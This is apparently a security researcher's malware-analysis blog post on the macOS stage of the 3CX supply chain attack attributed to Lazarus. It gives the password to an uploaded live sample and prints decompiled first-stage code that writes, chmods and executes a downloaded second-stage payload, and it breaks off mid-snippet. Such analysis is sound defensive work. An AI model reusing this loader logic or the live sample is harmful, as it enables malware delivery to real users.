Everyday is lazarus.dayβ

Ironing out (the macOS) details of a Smooth Operator (Part II)

2023-04-01, Objective-see
#SupplyChain #3CXDesktopApp #SmoothOperator #macOS


As “Sharing is Caring” I’ve uploaded the malicious binary UpdateAgent to our public macOS malware collection. The password is: infect3d
Earlier this week, I published a blog post that added a missing puzzle piece to the 3CX supply chain attack (attributed to the North Koreans, aka Lazarus Group).
In that post, we uncovered the trojanization component of macOS variant of the attack, comprehensively analyzed it, and provided IoCs for detection. I’d recommend reading that write up, as this post, part II, continues on from were that left off.
We ended the previous post, noting the main goal of the 1st-stage payload (
libffmpeg.dylib) was to download and execute a 2nd-stage payload named
UpdateAgent. The following snippet of annotated decompiled code, from the 1st-stage payload shows this logic:
//write out 2nd-stage payload "UpdateAgent" // which was just downloaded from the attacker's server stream = fopen(path2UpdateAgent, "wb"); fwrite(bytes, length, 0x1, stream); fflush(stream); fclose(stream); //make +x chmod(path2UpdateAgent, 755); //execute …